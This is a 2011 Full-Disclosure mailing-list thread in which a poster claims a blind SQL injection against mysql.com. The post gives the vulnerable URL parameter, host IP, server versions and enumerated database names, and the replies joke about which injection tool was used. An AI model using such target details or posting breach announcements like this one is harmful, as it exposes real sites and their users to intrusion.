pangolin or havij? lol
On Sun, Mar 27, 2011 at 8:54 AM, Cal Leeming <[email protected]> wrote:
> lmao.
>
> Was this accomplished using standard pattern from sqlmap, or did you make
> your own?
>
> On Sun, Mar 27, 2011 at 6:46 AM, Jack haxor <[email protected]> wrote:
>
>> ----------------------------------------------------------------------
>> [+] MySQL.com Vulnerable To Blind SQL Injection vulnerability
>> [+] Author: Jackh4xor @ w4ck1ng
>> [+] Site: http://www.jackh4xor.com
>> ----------------------------------------------------------------------
>>
>> About MySQL.com :
>>
>> ----------------------------------------------------------------------
>>
>> The Mysql website offers database software, services and support for your
>> business, including the Enterprise server, the Network monitoring and
>> advisory services and the production support. The wide range of products
>> include: Mysql clusters, embedded database, drivers for JDBC, ODBC and Net,
>> visual database tools (query browser, migration toolkit) and last but not
>> least the MaxDB- the open source database certified for SAP/R3. The Mysql
>> services are also made available for you. Choose among the Mysql training
>> for database solutions, Mysql certification for the Developers and DBAs,
>> Mysql consulting and support. It makes no difference if you are new in the
>> database technology or a skilled developer of DBA, Mysql proposes services
>> of all sorts for their customers.
>>
>> ----------------------------------------------------------------------
>>
>> Vulnerable Target : http://mysql.com/customers/view/index.html?id=1170
>> Host IP : 213.136.52.29
>> Web Server : Apache/2.2.15 (Fedora)
>> Powered-by : PHP/5.2.13
>> Injection Type : MySQL Blind
>> Current DB : web
>>
>> Data Bases:
>>
>> Current DB: web
>>
>> Tables
>>
>> Database : mysql
>> Table:
>>
>> # mysql.user Data
>>
>> Database: web_control
>>
>> Table:
>>
>> Database: certification
>>
>> Tables:
>>
>> Database: wordpress
>>
>> Tables:
>>
>> Database: bk
>>
>> Table:
>>
>> ----------------------------------------------------------------------
>> Signed : Jackh4xor !
>>
>> Greetz : rooto, Mr.52, zone-hacker, w4ck1ng
>>
>> (In)Security
>>
>> ----------------------------------------------------------------------
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
